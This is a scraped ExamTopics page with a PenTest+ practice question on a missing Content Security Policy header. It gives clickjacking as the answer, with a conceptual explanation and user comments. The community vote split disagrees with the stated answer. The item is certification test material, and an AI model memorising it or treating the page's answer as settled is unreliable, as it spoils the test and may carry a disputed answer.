A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?
PenTest+ Practice Tests Book
B. - Clickjacking is when a tester uses multiple transparent layers to trick a user into clicking a button or link on another page when they were intending to click the toplevel page. The tester is “hijacking” clicks and routing them to another page. In web browsers, clickjacking is a browser security issue that is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user’s knowledge, such as clicking a button that appears to perform another function.
This one was tough. Everything I read online said that CSP (Content Security Policy) helped to prevent XSS. However, I finally found a source that stated it protects against XSS and ClickJacking. Since XSS is not an option here ClickJacking is the best answer.
Source: https://content-security-policy.com/
the reference on the answer also mentioned clickjacking is prevented by CSP
upvoted 2 times
...
...
This section is not available anymore. Please use the main Exam Page.PT0-001 Exam Questions
Log in to ExamTopics
Sign in:
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.
Upvoting a comment with a selected answer will also increase the vote count towards that answer by one.
So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.
mr_robot
Highly Voted 5Â years, 3Â months agomiabe
Most Recent 3Â years agosomeguy1393
4Â years, 7Â months agotester27
4Â years ago